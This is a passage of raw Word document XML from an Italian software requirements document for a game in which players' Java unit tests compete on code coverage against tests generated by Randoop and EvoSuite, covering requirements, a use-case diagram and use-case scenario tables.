        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve">Portabilità </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504D91A6" w14:textId="364B2E3F" w:rsidR="00B407E8" w:rsidRPr="00715086" w:rsidRDefault="00B407E8">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Compatibilità</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2212B670" w14:textId="2DE49BAA" w:rsidR="00B407E8" w:rsidRPr="00715086" w:rsidRDefault="00B407E8">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve">Scalabilità </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795CA877" w14:textId="486FB954" w:rsidR="00B407E8" w:rsidRPr="00715086" w:rsidRDefault="00B407E8">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Facilità di deploy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138B9E76" w14:textId="31A3EB27" w:rsidR="00B407E8" w:rsidRPr="00715086" w:rsidRDefault="00B407E8">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Usabilità</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE54010" w14:textId="5A5F18C2" w:rsidR="00B407E8" w:rsidRPr="00715086" w:rsidRDefault="00B407E8" w:rsidP="00B407E8">
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve">Dal momento che ciascuno dei servizi è implementato tramite container Docker siamo riusciti a soddisfare questi requisiti, difatti ciascun container contiene al suo interno tutte le dipendenze necessarie ad esso, l’utilizzo del </w:t>
      </w:r>
      <w:r w:rsidR="00084B1B" w:rsidRPr="00715086">
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t>ocker compose inoltre permette una rapida e semplice installazione.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FB88A5" w14:textId="307BB8A6" w:rsidR="00B407E8" w:rsidRPr="00715086" w:rsidRDefault="00B407E8" w:rsidP="00084B1B">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc148195724"/>
      <w:r w:rsidRPr="00715086">
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00783ADC" w:rsidRPr="00715086">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00FF28B7" w:rsidRPr="00715086">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t>Requisiti sui dati</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="47FDB8E4" w14:textId="5035D3C6" w:rsidR="00084B1B" w:rsidRPr="00715086" w:rsidRDefault="00084B1B">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Le classi di test devono essere disponibili prima dell’avvio della partita</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC6B349" w14:textId="796666F4" w:rsidR="00084B1B" w:rsidRPr="00715086" w:rsidRDefault="00084B1B">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Deve essere rispettata la struttura del Filesystem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1642AA" w14:textId="009C8F31" w:rsidR="008F43FF" w:rsidRPr="00715086" w:rsidRDefault="00084B1B" w:rsidP="00B407E8">
      <w:r w:rsidRPr="00715086">
        <w:t>Il primo requisito indica che la generazione delle classi di test dei robot deve essere fatta offline in modo che l’utente non aspetti. Il secondo requisito facilita il recupero dei dati dalla repository condivisa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252A5E35" w14:textId="77777777" w:rsidR="00BC5849" w:rsidRPr="00715086" w:rsidRDefault="00BC5849" w:rsidP="00B407E8"/>
    <w:p w14:paraId="7F848E22" w14:textId="77777777" w:rsidR="00BC5849" w:rsidRPr="00715086" w:rsidRDefault="00BC5849" w:rsidP="00B407E8"/>
    <w:p w14:paraId="1EC7EA9C" w14:textId="77777777" w:rsidR="00BC5849" w:rsidRPr="00715086" w:rsidRDefault="00BC5849" w:rsidP="00B407E8"/>
    <w:p w14:paraId="39EC293D" w14:textId="77777777" w:rsidR="00BC5849" w:rsidRPr="00715086" w:rsidRDefault="00BC5849" w:rsidP="00B407E8"/>
    <w:p w14:paraId="2120940A" w14:textId="48EBD6D8" w:rsidR="00A02CD7" w:rsidRPr="00715086" w:rsidRDefault="00B87D3E" w:rsidP="00A02CD7">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc148195725"/>
      <w:r w:rsidRPr="00715086">
        <w:lastRenderedPageBreak/>
        <w:t>2.5</w:t>
      </w:r>
      <w:r w:rsidR="00A02CD7" w:rsidRPr="00715086">
        <w:t xml:space="preserve"> Diagramma dei casi d’uso</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="643B44CC" w14:textId="028447B5" w:rsidR="008F43FF" w:rsidRPr="00715086" w:rsidRDefault="009F6BE8" w:rsidP="009F6BE8">
      <w:r w:rsidRPr="00715086">
        <w:t>Il diagramma dei casi d’uso comprende tutte le funzionalità integrate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549C3BC7" w14:textId="01077E12" w:rsidR="00856018" w:rsidRPr="00715086" w:rsidRDefault="00CB3902" w:rsidP="006D3A77">
      <w:r w:rsidRPr="00715086">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="177C2D37" wp14:editId="4995A2CC">
            <wp:extent cx="5387447" cy="5052060"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="285992442" name="Immagine 1"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92442" name="Immagine 1" descr="Immagine che contiene testo, diagramma, schermata, cerchi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3740" cy="5057961"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F56FAF1" w14:textId="40C15553" w:rsidR="00CB3902" w:rsidRPr="00715086" w:rsidRDefault="00CB3902" w:rsidP="006D3A77">
      <w:r w:rsidRPr="00715086">
        <w:t>Il caso d’uso “Play” viene avviato dal giocatore nel momento in cui clicca sull’omonimo tasto per avviare il round. In particolare ciò darà il via all’operazione di compilazione della classe di test del giocatore, misurazione della coverage, recupero della coverage del robot sulla stessa classe under test, e il confronto dei risultati di coverage, quindi termina mostrando il vincitore della partita.</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:br/>
        <w:t>I due casi d’uso di generazione dei test invece vengono avviati dall’admin per la creazione dei livelli di Randoop e di EvoSuite, quindi per generare i test e misurare le rispettive coverage, che saranno salvate nel repository condiviso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670C54AA" w14:textId="77777777" w:rsidR="00BC5849" w:rsidRPr="00715086" w:rsidRDefault="00BC5849" w:rsidP="006D3A77"/>
    <w:p w14:paraId="4EF41EDC" w14:textId="77777777" w:rsidR="00BC5849" w:rsidRPr="00715086" w:rsidRDefault="00BC5849" w:rsidP="006D3A77"/>
    <w:p w14:paraId="3E99A3F5" w14:textId="77777777" w:rsidR="00BC5849" w:rsidRPr="00715086" w:rsidRDefault="00BC5849" w:rsidP="006D3A77"/>
    <w:p w14:paraId="557B89B6" w14:textId="77777777" w:rsidR="00BC5849" w:rsidRPr="00715086" w:rsidRDefault="00BC5849" w:rsidP="006D3A77"/>
    <w:p w14:paraId="07F03197" w14:textId="77777777" w:rsidR="00BC5849" w:rsidRPr="00715086" w:rsidRDefault="00BC5849" w:rsidP="006D3A77"/>
    <w:p w14:paraId="258C61BA" w14:textId="77777777" w:rsidR="00BC5849" w:rsidRPr="00715086" w:rsidRDefault="00BC5849" w:rsidP="006D3A77"/>
    <w:p w14:paraId="4C2CB366" w14:textId="011E3448" w:rsidR="00B87D3E" w:rsidRPr="00715086" w:rsidRDefault="00B87D3E" w:rsidP="00B87D3E">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc148195726"/>
      <w:r w:rsidRPr="00715086">
        <w:lastRenderedPageBreak/>
        <w:t>2.6 Scenari dei casi d’uso</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="0ADE5D70" w14:textId="711F3F7A" w:rsidR="009A1F5B" w:rsidRPr="00715086" w:rsidRDefault="009A1F5B" w:rsidP="00B87D3E">
      <w:r w:rsidRPr="00715086">
        <w:t>Di seguito sono riportati gli scenari dei casi d’uso che sono stati aggiunti/modificati durante l’integrazione.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236F0CD5" w14:textId="0FCB5FC5" w:rsidR="008B3233" w:rsidRPr="00715086" w:rsidRDefault="008B3233" w:rsidP="008B3233">
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc148195727"/>
      <w:r w:rsidRPr="00715086">
        <w:t>2.6.1 Play</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tabellagriglia4-colore1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2830"/>
        <w:gridCol w:w="6798"/>
      </w:tblGrid>
      <w:tr w:rsidR="008B3233" w:rsidRPr="00715086" w14:paraId="272274D7" w14:textId="77777777" w:rsidTr="007A7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23E534" w14:textId="77777777" w:rsidR="008B3233" w:rsidRPr="00715086" w:rsidRDefault="008B3233" w:rsidP="007A79D5">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Caso d’uso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6798" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="441CFCFE" w14:textId="1208B9D6" w:rsidR="008B3233" w:rsidRPr="00715086" w:rsidRDefault="008B3233" w:rsidP="007A79D5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Play</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B3233" w:rsidRPr="00715086" w14:paraId="03F5DEB9" w14:textId="77777777" w:rsidTr="007A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E92A67" w14:textId="77777777" w:rsidR="008B3233" w:rsidRPr="00715086" w:rsidRDefault="008B3233" w:rsidP="007A79D5">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Attore primario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6798" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F0CAA80" w14:textId="77777777" w:rsidR="008B3233" w:rsidRPr="00715086" w:rsidRDefault="008B3233" w:rsidP="007A79D5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Giocatore</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B3233" w:rsidRPr="00715086" w14:paraId="4AD85E74"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0A6E1A1B" w14:textId="77777777" w:rsidR="008B3233" w:rsidRPr="00715086" w:rsidRDefault="008B3233" w:rsidP="007A79D5">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Attore secondario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6798" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CEC2871" w14:textId="13E2C07A" w:rsidR="008B3233" w:rsidRPr="00715086" w:rsidRDefault="008B3233" w:rsidP="007A79D5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B3233" w:rsidRPr="00715086" w14:paraId="7C79A4C0" w14:textId="77777777" w:rsidTr="007A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AC5517" w14:textId="77777777" w:rsidR="008B3233" w:rsidRPr="00715086" w:rsidRDefault="008B3233" w:rsidP="007A79D5">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Descrizione</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6798" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1349421A" w14:textId="6CCE90A3" w:rsidR="008B3233" w:rsidRPr="00715086" w:rsidRDefault="008B3233" w:rsidP="007A79D5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Il giocatore avvia la partita contro il robot</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B3233" w:rsidRPr="00715086" w14:paraId="78CC0A77"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61B25AA0" w14:textId="77777777" w:rsidR="008B3233" w:rsidRPr="00715086" w:rsidRDefault="008B3233" w:rsidP="007A79D5">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Pre-condizioni</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6798" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="124B9627" w14:textId="77777777" w:rsidR="008B3233" w:rsidRPr="00715086" w:rsidRDefault="008B3233" w:rsidP="007A79D5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>La partita è stata correttamente caricata</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00801942" w:rsidRPr="00715086" w14:paraId="526ADA5C" w14:textId="77777777" w:rsidTr="00801942">
        <w:trPr>
          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
          <w:trHeight w:val="6075"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2830" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46BA6F31" w14:textId="77777777" w:rsidR="00801942" w:rsidRPr="00715086" w:rsidRDefault="00801942" w:rsidP="00801942">
            <w:r w:rsidRPr="00715086">
              <w:t>Sequenza eventi principale</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6798" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EBECC14" w14:textId="421E626B" w:rsidR="00801942" w:rsidRPr="00715086" w:rsidRDefault="0080194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Il caso d’uso è innescato alla pressione del tasto “Play”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38A7F34F" w14:textId="671EE5D2" w:rsidR="00801942" w:rsidRPr="00715086" w:rsidRDefault="0080194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A seconda che si sia scelto JaCoCo o EvoSuite per la compilazione e copertura:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E2DE196" w14:textId="77777777" w:rsidR="00801942" w:rsidRPr="00715086" w:rsidRDefault="00801942">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rsidRPr="00715086">
              <w:t>JaCoCo</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="613400B2" w14:textId="77777777" w:rsidR="00801942" w:rsidRPr="00715086" w:rsidRDefault="00801942">
            <w:pPr>
              <w:pStyle w:val="Paragrafoelenco"/>
              <w:numPr>
                <w:ilvl w:val="2"/>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  Il sistema fa una chiamata POST al server del compilatore (Task 7)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="230B9843" w14:textId="77777777" w:rsidR="00801942" w:rsidRPr="00715086" w:rsidRDefault="00801942">
            <w:pPr>
              <w:pStyle w:val="Paragrafoelenco"/>
              <w:numPr>
                <w:ilvl w:val="2"/>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  Il server restituisce l’output di compilazione e la coverage della classe di test valutata con JaCoCo (file XML)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EDD15E3" w14:textId="77777777" w:rsidR="00801942" w:rsidRPr="00715086" w:rsidRDefault="00801942">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rsidRPr="00715086">
              <w:t>EvoSuite</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="372ECCCA" w14:textId="77777777" w:rsidR="00801942" w:rsidRPr="00715086" w:rsidRDefault="00801942">
            <w:pPr>
              <w:pStyle w:val="Paragrafoelenco"/>
              <w:numPr>
                <w:ilvl w:val="2"/>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  Il sistema fa una chiamata POST al server del compilatore EvoSuite</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E55F63B" w14:textId="4CB2C41A" w:rsidR="00801942" w:rsidRPr="00715086" w:rsidRDefault="00801942">
            <w:pPr>
              <w:pStyle w:val="Paragrafoelenco"/>
              <w:numPr>
                <w:ilvl w:val="2"/>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  Il server restituisce l’output di compilazione e la coverage della classe di test valutata con EvoSuite (file CSV)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62D404EE" w14:textId="77777777" w:rsidR="00801942" w:rsidRPr="00715086" w:rsidRDefault="00801942">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rsidRPr="00715086">
              <w:t>Il sistema accede al repository condiviso</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7ACE13F2" w14:textId="0F839D43" w:rsidR="00801942" w:rsidRPr="00715086" w:rsidRDefault="00801942">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rsidRPr="00715086">
              <w:t>In base a classe, robot e livello scelti, recupera la coverage corrispondente</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EE023EC" w14:textId="6EC0F699" w:rsidR="00801942" w:rsidRPr="00715086" w:rsidRDefault="0080194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Viene effettuato il parsing </w:t>
            </w:r>
            <w:r w:rsidR="00C67B31" w:rsidRPr="00715086">
              <w:t>del file di coverage del robot (XML o CSV), per ottenere il valore di copertura delle linee di codice</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07CEFC10" w14:textId="6F11C7DE" w:rsidR="00801942" w:rsidRPr="00715086" w:rsidRDefault="0080194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Viene calcolata la copertura dell’utente</w:t>
            </w:r>
            <w:r w:rsidR="00C67B31" w:rsidRPr="00715086">
              <w:t xml:space="preserve"> a partire dai file XML o CSV (a seconda che si sia scelto JaCoCo o EvoSuite) per ottenere il valore di copertura delle linee di codice</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E622322" w14:textId="77777777" w:rsidR="00801942" w:rsidRPr="00715086" w:rsidRDefault="0080194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Viene confrontata la copertura del robot scelto con quella dell’utente</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="161FF07B" w14:textId="77777777" w:rsidR="00801942" w:rsidRPr="00715086" w:rsidRDefault="0080194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Viene mostrato un alert con il vincitore e le coverage del giocatore e del robot</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E724FC4" w14:textId="450C5B9D" w:rsidR="00801942" w:rsidRPr="00715086" w:rsidRDefault="0080194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Viene mostrato l’output di compilazione e i risultati di coverage nell’output window</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00801942" w:rsidRPr="00715086" w14:paraId="01637FF7"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6847D230" w14:textId="77777777" w:rsidR="00801942" w:rsidRPr="00715086" w:rsidRDefault="00801942" w:rsidP="00801942">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Post-condizioni</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6798" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26576251" w14:textId="25B7AAB6" w:rsidR="00801942" w:rsidRPr="00715086" w:rsidRDefault="00801942" w:rsidP="00801942">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Si conosce il vincitore della partita</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00801942" w:rsidRPr="00715086" w14:paraId="7EDF365A" w14:textId="77777777" w:rsidTr="00573BAE">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tcPr>
          <w:p w14:paraId="335151AC" w14:textId="77777777" w:rsidR="00801942" w:rsidRPr="00715086" w:rsidRDefault="00801942" w:rsidP="00801942">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Sequenza eventi alternativi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6798" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AB9D76E" w14:textId="1BB9EEEB" w:rsidR="00801942" w:rsidRPr="00715086" w:rsidRDefault="00801942">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715086">
              <w:t>Errore in fase di compilazione:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="568A6782" w14:textId="77777777" w:rsidR="00801942" w:rsidRPr="00715086" w:rsidRDefault="00801942">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715086">
              <w:t>Viene mostrato un alert “Errore nel test dell'utente”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16B1CA2F" w14:textId="77777777" w:rsidR="00801942" w:rsidRPr="00715086" w:rsidRDefault="00801942">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715086">
              <w:t>Viene mostrato nell’output window l’output della compilazione</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F2FA0A1" w14:textId="5E5C7323" w:rsidR="00801942" w:rsidRPr="00715086" w:rsidRDefault="00801942">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715086">
              <w:t>Errore nel test del robot:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11324125" w14:textId="5AA6BDF4" w:rsidR="00801942" w:rsidRPr="00715086" w:rsidRDefault="00801942">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715086">
              <w:t>Viene mostrato un alert “Errore robot”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15EF2AF0" w14:textId="33F8E89F" w:rsidR="00801942" w:rsidRPr="00715086" w:rsidRDefault="00801942">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715086">
              <w:t>Viene mostrato nell’output window l’output della compilazione</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="722E8CDF" w14:textId="7436D9DE" w:rsidR="00801942" w:rsidRPr="00715086" w:rsidRDefault="00801942" w:rsidP="00801942">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1E2912CC" w14:textId="77777777" w:rsidR="00652020" w:rsidRPr="00715086" w:rsidRDefault="00652020" w:rsidP="009A1F5B"/>
    <w:p w14:paraId="785A68AE" w14:textId="77777777" w:rsidR="00BC5849" w:rsidRPr="00715086" w:rsidRDefault="00BC5849" w:rsidP="009A1F5B"/>
    <w:p w14:paraId="65604050" w14:textId="77777777" w:rsidR="00BC5849" w:rsidRPr="00715086" w:rsidRDefault="00BC5849" w:rsidP="009A1F5B"/>
    <w:p w14:paraId="35850C4F" w14:textId="77777777" w:rsidR="00BC5849" w:rsidRPr="00715086" w:rsidRDefault="00BC5849" w:rsidP="009A1F5B"/>
    <w:p w14:paraId="2E2FC89A" w14:textId="77777777" w:rsidR="00BC5849" w:rsidRPr="00715086" w:rsidRDefault="00BC5849" w:rsidP="009A1F5B"/>
    <w:p w14:paraId="31C4B264" w14:textId="50A69ED7" w:rsidR="009A1F5B" w:rsidRPr="00715086" w:rsidRDefault="009A1F5B" w:rsidP="009A1F5B">
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc148195728"/>
      <w:r w:rsidRPr="00715086">
        <w:lastRenderedPageBreak/>
        <w:t>2.6.</w:t>
      </w:r>
      <w:r w:rsidR="002A070B" w:rsidRPr="00715086">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve"> Generazione </w:t>
      </w:r>
      <w:r w:rsidR="00C67B31" w:rsidRPr="00715086">
        <w:t>Test Randoop</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tabellagriglia4-colore1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2830"/>
        <w:gridCol w:w="6798"/>
      </w:tblGrid>
      <w:tr w:rsidR="001C02FD" w:rsidRPr="00715086" w14:paraId="522F0FE6" w14:textId="77777777" w:rsidTr="002B3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9C928C4" w14:textId="77777777" w:rsidR="001C02FD" w:rsidRPr="00715086" w:rsidRDefault="001C02FD" w:rsidP="002B30C7">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Caso d’uso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6798" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="552D9EB9" w14:textId="0CFD22FD" w:rsidR="001C02FD" w:rsidRPr="00715086" w:rsidRDefault="00851DA6" w:rsidP="002B30C7">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1C02FD" w:rsidRPr="00715086" w14:paraId="667906D3"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81CB96" w14:textId="77777777" w:rsidR="001C02FD" w:rsidRPr="00715086" w:rsidRDefault="001C02FD" w:rsidP="002B30C7">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Attore primario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
